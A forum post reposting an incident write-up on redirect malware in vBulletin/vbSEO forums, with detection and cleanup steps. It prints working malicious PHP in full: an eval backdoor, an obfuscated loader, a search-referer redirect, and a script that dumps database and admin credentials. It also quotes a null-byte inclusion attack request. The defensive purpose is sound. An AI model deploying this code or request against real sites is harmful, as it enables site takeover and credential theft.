02.08.2013, 19:00   #1
Alex LM

vBulletin, vbSEO and a redirect from search (Yandex, Google) to myfilestore.com (file2store.info etc.)

The security problems of the vbSEO product have been known for a long time ( http://www.seocafe.info/vbulletin/119-vbseo.html ).

This thread is about a vulnerability that redirects visitors coming from search engines (Yandex, Google, etc.) to "foreign" pages (often myfilestore.com, file2store.info, etc.).

A message, for example:
URL: http://www.forum/misc.php?v...
Process: ...
Infection: HTML:RedirDL-inf [Trj]


In other words, those who come to your forum from a search engine first land on myfilestore.com.
Characteristically, the redirect fires about once a day. Subsequent visits from search (within the same day) go normally (to the forum).

Overall the forum works fine, and that is the whole insidiousness of the "redirect to myfilestore.com" vulnerability.
Naturally, search engines do not like such redirects. A long-lasting infestation will almost certainly get the forum demoted in the search results (usually seen as a sharp drop in traffic).

Closer to the point, the solution to the problem: http://club.myce.com/f20/vbulletin-m...e-them-332219/
+ a copy-paste, in case the original source is down:
Off-topic:
For our Myce members - This post is to inform fellow Vbulletin owners with information from a hack we suffered from. This should not have affected our users.

We have been working hard together with fellow forum owners in solving a redirection issue that seems to be infecting thousands of Vbulletin sites. Instead of giving you the usual advice, we have been able to trace back most of the works of this malware and provide some real working fixes.

Please link to this thread so it gets on top in Google and makes sure we help a lot of other Vbulletin owners!

Index
  1. What happens?
  2. How to find out if you are infected?
  3. What do they do?
  4. How do they get access to your admincp?
  5. What countermeasures can be taken?
  6. Remaining questions

What happens?

If people come from search engines like Google, Bing, Yahoo, Yandex, Rambler or Baidu they end up on another site than yours. They are redirected to any of these sites (please tell us when one is missing)
  • myfilestore.com
  • filestore72.info
  • file2store.info
  • url2short.info
  • filestore123.info
  • url123.info
  • dollarade.com

myfilestore.com and related sites

These websites appear to be affiliate sites that lets you download something. Most likely once the installation is done the 'hackers' will receive a fee or they try to infect people with malware. It's always a good idea to do additional virus scanning when you've ended up on that page. We've also submitted the domains to Google which will hopefully take measures.

How to find out if your forum is infected?

Most likely your visitors will report that they are redirected to another site when trying to visit your site from search engines. They will likely note one of the sites in the list above.

To reproduce yourself:
  1. Open a private/incognito window in your browser or clear cache and cookies
  2. Go to either Google, Bing, Yahoo, Yandex, Rambler or Baidu
  3. Search for a term of which you know your site will appear in the search engine
  4. Click a result
  5. If nothing happens, it might be wise to try a couple of times to be sure you're not infected

Besides that, check your datastore:
  • If you're using a file based datastore then get it from /includes/datastore/datastore_cache.php
  • In the database, table datastore and field pluginslist

In either one, best to even check both, search for strange code, think about long strings containing random characters, hashes or anything else unusual. The code injected to our site was this:

PHP Code:
$o = 'b5e20b9bb877342f907b745fdd1f42bd';
$vbg = '<LONG LINE OF ENCODED CRAP WHICH WE REMOVED FOR READABILITY>';
$xml = '$z#rB&_K=ZN;Es4tA6xgw/dof05eU~`:[k3{^ycF}<JbqGM7V!1au,l*[email protected]%j(>C9YT)PR?"X-pQni]LDmO|W2vISh';
$xml2 = '&sL8VZ`g[c+4]N~l3.:0}XwtB>=iebv/FJ*RP,6HO2(?Q_EjK7;[email protected]!5rf)U1{nz#dkmGau^yp$<| M%DW-qI"xA';
// strtr() maps every character of the blob through the $xml -> $xml2 substitution table,
// and substr() pulls a single character out of the blob to finish the regex pattern
// (most likely the 'e' modifier, which makes preg_replace() evaluate the decoded code)
$as = '#c#'.substr($vbg, 365, 1);
$vbt = preg_replace($as, strtr($vbg, $xml, $xml2), 'css');

The criminals also seem to inject code in plugins. It's a bit hard to find it and they appear to use different methods. It's very important however that you find this, with their code they have your site under full control.

Plugin code we found so far

By going through all hooks in misc.php we found that in this file there are only hooks that start with 'misc'.

We went in the plugin manager and searched for plugins that hook into anything starting with 'misc'. In our installation there were only six. By manually opening them we found out that in the plugin 'vBSEO Misc Start' that hooks into 'misc_start' the following code was inserted:

PHP Code:
if(defined('VBSEO_ENABLED')) {
    vbseo_complete_sec('misc_start');
}
if(isset($_REQUEST['e']) && $_REQUEST['do'] == 'config') {
    eval($_REQUEST['e']);
    die();
}

This means that our server is wide open to hackers. The eval() command can be used to execute any PHP code on our servers and this code could be fed to eval() by adding some <?php ?> wrapped code to the 'e' parameter.

While we're not sure if we closed the loophole completely, this code is the first thing to disable. You can remove the last 4 lines completely or just comment out the eval line. We added a nice surprise for the hackers if they are calling it again.

Another plugin, reported by Scott. We don't immediately understand why they add this as the code doesn't seem to be harmful.

PHP Code:
if(preg_match("/image|do=|dateline/i",$_ENV['REQUEST_URI']) || isset($_ENV['QUERY_STRING']) || isset($_POST)) {
} else {
    ob_start();
    ob_implicit_flush(1);
    flush();
    ob_flush();
} // closing brace added here; the reported snippet stopped at ob_flush()

The code they add to the plugins/datastore was decoded and looked like this:

PHP Code:
$q='ini_set';
if(function_exists($q))
{
    // hide PHP errors so a failing payload leaves no trace in the logs
    $q('display_errors',0);
    $q('log_errors',0);
}

// backdoor: any POST field named after the hash in $o is rot13+base64 decoded and executed
if(isset($_POST[$o]))
    eval(base64_decode(str_rot13($_POST[$o])));

$u=@preg_match('#bot|spider|crawl|slurp|yandex#i',$_SERVER['HTTP_USER_AGENT']);   // is this a crawler?
$s=@parse_url($_SERVER['HTTP_REFERER']);
$t=@$s['host'];
$r=@preg_match('#live\.com|google\.|yahoo\.|bing.com|yandex\.ru|rambler\.ru|baidu\.#i',$t);   // did the visitor come from a search engine?
$h=@$_SERVER['HTTP_HOST'];
$p=@COOKIE_PREFIX;
$a=@THIS_SCRIPT==='misc';
$c=$p.'lastvisit';
$n=$p.'lang_id';          // marker cookie: once set, the visitor is not redirected again
$y=@ord(FILE_VERSION)>51;
$z=empty($_SERVER['HTTP_X_MOZ']);
$j='<script type="text/javascript" src="'.$vbulletin->options['bburl'].'/misc.php?v='.$vbulletin->options['simpleversion'].'&amp;g=js"></script>';

if(empty($_COOKIE[$n]))
{
    // second request: the injected <script> tag loads misc.php?v=...&g=js and gets the redirect
    if($a && isset($_GET['v']) && (isset($_GET['g'])) && (!empty($_COOKIE[$c])))
    {
        if($t==$h)
        {
            if($z)
                setcookie($n,'en',time()+36000);
            $m=substr(md5($h),0,8);
            print("document.location='h**p://my****store.com/download.php?id={$m}'");
        }
        exit;
    }
    // first request: a human coming from a search engine gets the <script> tag injected into the page
    if((!$u) && $r)
    {
        if($y)
        {
            $GLOBALS['template_hook']['headinclude_javascript'].=$j;
        }
        else
        {
            $GLOBALS['style']['css'].=$j;
        }
    }
}

This means we found out what caused the redirect. We recovered by saving some settings again, which made the datastore refresh, and it was gone.

Besides the changes to the datastore and the plugins, we also found out that they are posting long strings of encoded data to sites. This looks like this:

PHP Code:
$_POST['<SOME KIND OF HASH>'] = 'MJAbolOgMQHbWmWwLmV3Mw ... < ENCODED CRAP ONE AGAIN > ... yzZGWuAmL1BQp5MQt5Z2D4Z2R2Z2MxMQSuWl.....';

And here's the decoded code, don't get scared! We decoded it using

PHP Code:
echo(base64_decode(str_rot13('encrypted string')));

(credits ovk)
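The thread describes two encodings: the request side is base64 wrapped in str_rot13, and the response side (shown further down in the harvested-data script) is serialize() -> gzcompress() -> base64 with the '=' padding stripped -> str_rot13, sandwiched between two md5 markers. The following is an added example, not code from the myce thread or from vBulletin, that reverses both so captured POST bodies and responses can be read offline. PHP's gzcompress() emits zlib (RFC 1950) data, so zlib.decompress() reads it directly; the md5 marker values and the sample payloads are constructed placeholders, and the PHP unserialize reader only covers the types the $oa array uses.

```python
import base64
import codecs
import re
import zlib

# The md5 markers the script prints before and after the blob are 32 hex characters each;
# their actual values are unknown here, so the match only relies on the length.
_MARKER_WRAPPED = re.compile(r"^([0-9a-f]{32})(.*)([0-9a-f]{32})$", re.S)


def decode_request(field_value: str) -> bytes:
    """Undo str_rot13 + base64 on the value the backdoor reads from $_POST[$o]."""
    return base64.b64decode(codecs.encode(field_value, "rot_13"))


def php_unserialize(data: bytes):
    """Minimal reader for the PHP serialize() subset used by $oa (arrays, strings, ints, floats, bools, null)."""
    value, _ = _parse(data, 0)
    return value


def _parse(data: bytes, pos: int):
    t = data[pos:pos + 1]
    if t == b"N":
        return None, pos + 2                                   # "N;"
    if t in (b"i", b"b", b"d"):
        end = data.index(b";", pos)
        raw = data[pos + 2:end]
        val = float(raw) if t == b"d" else int(raw)
        return (bool(val) if t == b"b" else val), end + 1
    if t == b"s":
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])                       # byte length
        start = colon + 2                                      # skip ':"'
        text = data[start:start + length]
        return text.decode("utf-8", "replace"), start + length + 2   # skip '";'
    if t == b"a":
        colon = data.index(b":", pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2                                        # skip ':{'
        items = {}
        for _ in range(count):
            key, pos = _parse(data, pos)
            val, pos = _parse(data, pos)
            items[key] = val
        return items, pos + 1                                  # skip '}'
    raise ValueError(f"unsupported PHP type {t!r} at offset {pos}")


def decode_response(body: str) -> dict:
    """Strip the md5 markers, undo rot13, restore base64 padding, inflate and unserialize."""
    m = _MARKER_WRAPPED.match(body.strip())
    blob = m.group(2) if m else body.strip()
    b64 = codecs.encode(blob, "rot_13")
    b64 += "=" * (-len(b64) % 4)                               # the script strips '=' padding
    return php_unserialize(zlib.decompress(base64.b64decode(b64)))


# --- constructed fixtures so the decoders can be exercised offline ---

def build_request_fixture(php_source: bytes) -> str:
    """Encode the way the backdoor expects (base64, then rot13); constructed test input only."""
    return codecs.encode(base64.b64encode(php_source).decode("ascii"), "rot_13")


def build_response_fixture(serialized: bytes) -> str:
    """Encode the way the harvested-data script does; the md5 markers here are placeholders."""
    b64 = base64.b64encode(zlib.compress(serialized, 9)).decode("ascii").replace("=", "")
    return "0" * 32 + codecs.encode(b64, "rot_13") + "f" * 32


SAMPLE_REQUEST = build_request_fixture(b"echo 'marker';")
SAMPLE_RESPONSE = build_response_fixture(
    b'a:2:{s:4:"ecnt";i:0;s:1:"d";a:1:{i:0;s:4:"text";}}'
)

if __name__ == "__main__":
    print(decode_request(SAMPLE_REQUEST))
    print(decode_response(SAMPLE_RESPONSE))
```

Run it against a real capture by passing the POST field value to decode_request() and the full response body to decode_response(); the 'd' key of the result holds the buffered output (credentials and admin rows), the 'e' key the PHP errors the script swallowed.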


PHP Code:
echo md5('3c4eb64c8db01a5ab261e18fdc16089e');   // start marker so the caller can find the payload in the page
$oa=array('ecnt'=>0);
function weh($en, $es, $ef, $el){global $oa;$oa['e'][]=array($en,$es,$ef,$el);};
set_error_handler('weh');                          // swallow errors into $oa instead of the server log
ini_set('log_errors',0);
ob_start();
gtadmndtas();

function gtadmndtas()
{
    $out = $bf = $h = '';
    $ag = array();

    // load vBulletin's config.php (database credentials) and the vBSEO config.xml
    if(is_file('includes/config.php'))
    {
        include('includes/config.php');
        if(is_file('vbseo/resources/xml/config.xml'))
        {
            $bf = @file_get_contents('vbseo/resources/xml/config.xml');
        }
    }
    elseif(is_file('config.php'))
    {
        include('config.php');
        if(is_file('../vbseo/resources/xml/config.xml'))
        {
            $bf = @file_get_contents('../vbseo/resources/xml/config.xml');
        }
    }
    else
    {
        echo "BD error: config not found\n";
        return;
    }

    // pull the VBSEO_ADMIN_PASSWORD value out of config.xml
    if(!empty($bf))
    {
        $a = strpos($bf, '<name>VBSEO_ADMIN_PASSWORD</name>');
        if($a !== false)
        {
            $a = strpos($bf, '<value>', $a + 10);
            $b = strpos($bf, '</value>', $a + 7);
            if(($a !== false) && ($b !== false))
            {
                $h = substr($bf, $a + 7, $b - $a - 7);
            }
        }
    }

    // dump everything needed to reach the database and the admin panel
    $out .= "---------------=-=pong1234321=-=--------------------------<br>\n";
    if(!empty($h))
    {
        $out .= "VBSH: {$h}<br>\n";
    }
    $out .= "ACP: {$config['Misc']['admincpdir']}<br>\n";
    $out .= "dbtype: {$config['Database']['dbtype']}<br>\n";
    $out .= "servername: {$config['MasterServer']['servername']}<br>\n";
    $out .= "port: {$config['MasterServer']['port']}<br>\n";
    $out .= "dbname: {$config['Database']['dbname']}<br>\n";
    $out .= "username: {$config['MasterServer']['username']}<br>\n";
    $out .= "password: {$config['MasterServer']['password']}<br>\n";
    $out .= "tableprefix: {$config['Database']['tableprefix']}<br>\n";
    $out .= "technicalemail: {$config['Database']['technicalemail']}<br>\n";
    $out .= "-----------------------------------------<br>\n";

    echo $out;
    $out = '';
    $gt = "{$config['Database']['tableprefix']}usergroup";
    $mt = "{$config['Database']['tableprefix']}user";

    $mysql_conn = mysql_connect("{$config['MasterServer']['servername']}:{$config['MasterServer']['port']}", $config['MasterServer']['username'], $config['MasterServer']['password']);
    if(!$mysql_conn)
    {
        echo "Mysql login failed!";
        return;
    }

    if(!mysql_select_db($config['Database']['dbname'], $mysql_conn))
    {
        echo "Mysql database selection failed!";
        return;
    }

    // every usergroup with admin permissions ...
    $sql = "SELECT usergroupid FROM $gt WHERE adminpermissions>1";
    $res = mysql_query($sql);
    if(!$res)
    {
        $err = mysql_error($mysql_conn);
        echo "Mysql query failed: $err";
        return;
    }

    while($row = mysql_fetch_assoc($res))
    {
        $ag[] = intval($row['usergroupid']);
    }

    // ... and the accounts in them, including password hash and salt
    $ags = implode(',',$ag);
    $sql = "SELECT userid,username,email,usergroupid,password,salt FROM $mt WHERE usergroupid IN ($ags)";
    $res = mysql_query($sql);
    if(!$res)
    {
        $err = mysql_error($mysql_conn);
        echo "Mysql query failed: $err";
        return;
    }

    while($row = mysql_fetch_assoc($res))
    {
        $data = implode("|:|", $row);
        $data = htmlentities($data);
        $out .= "$data<br>\n";
    }

    $out .= "-----------------------------------------\n<br>\n";
    echo $out;
    $out = '';
}

// pack the buffered output plus the collected errors and return them encoded between two md5 markers
$out=ob_get_contents();
ob_end_clean();
$oa['d'][0]=$out;
$out=serialize($oa);
$out=gzcompress($out,9);
$out=base64_encode($out);
$out=str_replace('=','',$out);
$out=str_rot13($out);
echo($out);
echo md5('117ae4783ac97ecf30b2419315518cd1');
exit;

Or pastebin for increased readability: http://pastebin.com/cCd72uZN

What do they do?

We think this is how they do it:
  1. Get access to the admin panel (see below)
  2. Add data to a plugin, both a method to open your entire server to them and the code that inserts javascript on your site and causes the redirection
  3. With this in place, they POST another encrypted string that executes code that reveals passwords etc and allows them to compromise whatever they want

How do they get access to your admin panel

This part is still a bit of guesswork, but we found some strange URLs being called on our server. We expect that they have more methods, but we can confirm at least one strange thing.

They request URLs like this:

Code:
adminhash = *************************
128.2.142.104 160971 - [17/Apr/2013:16:19:43 +0200] "POST /?vbseourl%00=admincp/plugin.php"

Which seems to make use of an arbitrary PHP file inclusion issue:

http://www.madirish.net/397


What countermeasures can be taken?

The good news, A LOT!

Credits to ovk

Add this at the top of your yourforum/misc.php

PHP Code:
// isset() first, so the check does not raise an undefined-index notice on every other request
if (isset($_GET['g']) && $_GET['g'] == 'js') die;

This doesn't stop the actual hack, but stops the redirects. This prevents the javascript from executing. It's possible that they change variable names, so check your injected code if it's ['g'] or another character.

Credits to Liggy
  • Change the passwords of ALL users that have access to the admin panel or demote them to regular users until you know that they have changed their password. Since the hacker may have access to the users account, a confirmation via Instant Messenger would be best as the hacker could send a PM or fake the sender address of an email
  • In the admin panel go to Plugins&Products -> Plugin Manager and check everything that is hooked at misc_start for code that contains eval($_REQUEST. In our forum that code was inserted into vBSEO Misc Start. They are trying to hide their traces by adding lots of empty lines which will not show their code unless you scroll down. This particular plugin (in the version we have) should only contain the following two lines:
    PHP Code:
    if(defined('VBSEO_ENABLED'))
        vbseo_complete_sec('misc_start');
  • Go back to Plugin Manager, scroll to the end of the page and click Save Active Status. This should remove traces from the pluginlist entry in the datastore table.
  • This step may be optional with the previous one, but just to be sure go to vBulletin Options->vBulletin Options->User Banning options and click Save without changing anything. This should update the datastore_cache.php file
  • If possible, limit the access to your Admin Panel with an additional web server password using e.g. a .htaccess file and provide your admins with the login details.

To verify that there are no traces of the exploit left in your current installation, first take a look at your database. Search the data column in table datastore for the text strtr. (SELECT * FROM datastore WHERE data LIKE '%strtr%') - Future exploits may however use different ways of running their code - no universal method available.

Next check is looking at table adminutil if the entry with title datastore contains the text strtr.

Last step is checking file includes/datastore/datastore_cache.php for text strtr.
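The three checks above (datastore.data, adminutil, datastore_cache.php) all come down to searching text for the decoder's fingerprints, and the plugin check earlier in the post adds the eval($_REQUEST pattern and the blank-line padding trick. The script below is an added example, not code from the myce thread or from vBulletin, that runs those searches over a file or a pasted SQL dump and reports what it finds. The indicator list is taken from the injected code quoted in this thread; the regexes, the severities and the 40-blank-line threshold are this example's own choices, and the sample inputs are constructed from the thread's snippets.

```python
import re
from pathlib import Path

# (regex, severity) per indicator; derived from the injected code quoted in the thread
INDICATORS = {
    "eval_of_request":   (re.compile(r"eval\s*\(\s*\$_(?:REQUEST|POST|GET|COOKIE)\b"), "high"),
    "rot13_base64_eval": (re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*str_rot13"), "high"),
    "strtr_decoder":     (re.compile(r"strtr\s*\(\s*\$\w+\s*,\s*\$\w+\s*,\s*\$\w+\s*\)"), "high"),
    "js_redirect":       (re.compile(r"document\.location\s*="), "medium"),
    "referer_gate":      (re.compile(r"(?:google|yahoo|yandex|baidu|rambler)\\\."), "medium"),
    "hex_hash_var":      (re.compile(r"\$\w+\s*=\s*'[0-9a-f]{32}'"), "low"),
    "preg_replace_dyn":  (re.compile(r"preg_replace\s*\(\s*\$\w+"), "low"),   # pattern built at runtime
}


def scan_text(text: str, blank_run_threshold: int = 40) -> list:
    """One finding per indicator hit, plus one per oversized run of blank lines that hides code below it."""
    findings = []
    blank_run = 0
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            blank_run += 1
            continue
        if blank_run >= blank_run_threshold:
            findings.append({"line": lineno, "indicator": "blank_line_padding", "severity": "medium",
                             "snippet": f"{blank_run} blank lines before this code"})
        blank_run = 0
        for name, (rx, severity) in INDICATORS.items():
            if rx.search(line):
                findings.append({"line": lineno, "indicator": name, "severity": severity,
                                 "snippet": line.strip()[:80]})
    return findings


def scan_file(path) -> list:
    """Scan datastore_cache.php, an exported plugin, or a SQL dump of the datastore/adminutil tables."""
    return scan_text(Path(path).read_text(encoding="utf-8", errors="replace"))


def indicator_names(findings) -> set:
    return {f["indicator"] for f in findings}


# --- constructed samples modelled on the snippets quoted in the thread ---
CLEAN_PLUGIN = "if(defined('VBSEO_ENABLED'))\n    vbseo_complete_sec('misc_start');\n"

INFECTED_PLUGIN = CLEAN_PLUGIN + "\n" * 60 + (
    "if(isset($_REQUEST['e']) && $_REQUEST['do'] == 'config') {\n"
    "    eval($_REQUEST['e']);\n"
    "    die();\n"
    "}\n"
)

DATASTORE_SNIPPET = (
    "$o = 'b5e20b9bb877342f907b745fdd1f42bd';\n"
    "$vbg = '<blob removed>';\n"
    "$as = '#c#'.substr($vbg, 365, 1);\n"
    "$vbt = preg_replace($as, strtr($vbg, $xml, $xml2), 'css');\n"
)

REDIRECT_SNIPPET = (
    "$r=@preg_match('#live\\.com|google\\.|yahoo\\.|bing.com|yandex\\.ru#i',$t);\n"
    "print(\"document.location='h**p://example.invalid/download.php?id={$m}'\");\n"
)

if __name__ == "__main__":
    for f in scan_text(INFECTED_PLUGIN) + scan_text(DATASTORE_SNIPPET):
        print(f"line {f['line']:>4}  {f['severity']:<6} {f['indicator']:<20} {f['snippet']}")
```

The low-severity indicators (a 32-character hex literal, preg_replace() with a runtime-built pattern) are there to pull the analyst's eye to a block, not to condemn it on their own; a hit on eval_of_request or strtr_decoder in a plugin or datastore row is the thing to act on. As the post says, future variants may use different encodings, so treat the list as a starting point.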

Credits to Liggy

Also add this code at the beginning of yourforum/vbseo.php

PHP Code:
// strpos() returns 0 when the match is at offset 0 and 0 is falsy, so compare with false explicitly
if (strpos($_SERVER["QUERY_STRING"], '%00') !== false)
    die;

[EDIT by Liggy]You may also send them some greetings like we did [/EDIT]


Remaining questions
  • Did they get access to the admincp using an exploit/backdoor?
  • Did they get access by compromising an admin account, and how?
  • Are our counter measures successful or will we face another attempt?

Bonus material

If you kept reading, well done! You might want to add some logging to see what's going on and help in our quest to find out everything. Here's some code that you can add to yourforum/includes/config.php

PHP Code:
function DumpToLog($DoPost=false)
{
    $logfile=@fopen('{Enter your path here}' . date('Ymd') . '.log',"a");
    if ($logfile)
    {
        if (isset($_COOKIE["bbuserid"]) && $_COOKIE["bbuserid"])
            $bbuser=$_COOKIE["bbuserid"];
        else
            $bbuser='-';
        if (isset($_SERVER["REMOTE_USER"]))
            $ruser=$_SERVER["REMOTE_USER"];
        else
            $ruser='-';

        // one line per request: client IP, vBulletin user id, HTTP auth user, timestamp, method and URI
        fprintf($logfile,'%s %s %s [%s] "%s %s"%s',
            $_SERVER['REMOTE_ADDR'],$bbuser,$ruser,date('d/M/Y:H:i:s O'),$_SERVER["REQUEST_METHOD"],$_SERVER["REQUEST_URI"],"\n"
        );

        if ($DoPost && ($_SERVER["REQUEST_METHOD"]=="POST"))
        {
            // the marker goes into the log file, not into the HTTP response
            fwrite($logfile,"POST data:\n");
            foreach($_POST as $postvar=>$postvalue)
                fprintf($logfile,"%s = %s\n",$postvar,$postvalue);
        }

        fclose($logfile);
    }
}

DumpToLog(false);

You can change the call from DumpToLog(false) to DumpToLog(true) to also log the POST variables. However this can lead to very big log sizes and add sensitive data like passwords or password hashes to the log file.
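Once DumpToLog() has been writing for a while, the interesting lines are the ones the thread already names: the %00 trick against vbseourl, the misc.php?v=...&g=js beacon loaded by the injected script tag, and the do=config / e call shape of the eval() backdoor. The following is an added example, not code from the myce thread or from vBulletin, that parses that one-line-per-request format and flags those three patterns. The sample log lines are constructed (documentation IP ranges, a redacted e value) and the flag names are this example's own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Matches the format written by DumpToLog(): ip bbuser ruser [timestamp] "METHOD URI"
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) \[([^\]]+)\] "(\S+) (.*)"$')


def parse_line(line: str):
    """Split one log line into its fields, or return None for lines that do not match."""
    m = LINE_RE.match(line.rstrip("\n"))
    if not m:
        return None
    ip, bbuser, ruser, ts, method, uri = m.groups()
    return {"ip": ip, "bbuser": bbuser, "ruser": ruser, "time": ts, "method": method, "uri": uri}


def flags_for(entry: dict) -> list:
    """Apply the request patterns described in the thread to one parsed entry."""
    flags = []
    uri = entry["uri"]
    parts = urlsplit(uri)
    query = parse_qs(parts.query, keep_blank_values=True)   # parse_qs turns %00 into a NUL character
    # encoded NUL in the query string: the vbseourl%00=admincp/... request shape
    if "%00" in uri.lower() or any("\x00" in k or any("\x00" in v for v in vs) for k, vs in query.items()):
        flags.append("null_byte")
    # the injected <script> tag fetches misc.php?v=...&g=js to get the redirect
    if parts.path.endswith("misc.php") and "v" in query and "g" in query:
        flags.append("redirect_beacon")
    # call shape of the eval() backdoor planted in the misc_start plugin
    if query.get("do") == ["config"] and "e" in query:
        flags.append("eval_backdoor_call")
    return flags


def analyze_log(text: str) -> list:
    """Return only the entries that raised at least one flag, with their line numbers."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = parse_line(line)
        if entry is None:
            continue
        flags = flags_for(entry)
        if flags:
            hits.append({"line": lineno, "ip": entry["ip"], "uri": entry["uri"], "flags": flags})
    return hits


# constructed sample in the DumpToLog() format
SAMPLE_LOG = "\n".join([
    '198.51.100.7 - - [17/Apr/2013:16:19:43 +0200] "POST /?vbseourl%00=admincp/plugin.php"',
    '203.0.113.5 12 - [17/Apr/2013:16:20:01 +0200] "GET /forum/showthread.php?t=123"',
    '203.0.113.9 - - [17/Apr/2013:16:21:11 +0200] "GET /forum/misc.php?v=4&g=js"',
    '198.51.100.7 - - [17/Apr/2013:16:22:30 +0200] "POST /forum/misc.php?do=config&e=%5Bredacted%5D"',
])

if __name__ == "__main__":
    for hit in analyze_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['ip']} {','.join(hit['flags'])}  {hit['uri']}")
```

A redirect_beacon hit is a visitor who was served the injected script tag, so the timestamp tells you when the datastore was still dirty; a null_byte or eval_backdoor_call hit is the source address to block and the time window to compare against the admin log and the plugin table.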

(Once again, credits to Liggy!)

Please, if you're reading this and can provide us with additional information, REGISTER and post additional information, also questions are welcome.

Your questions might give us an additional path to trace down the origin of this hack.




Tags
file2store.info, myfilestore.com, vbseo, vbulletin, vbulletin redirect, google redirect, redirect from yandex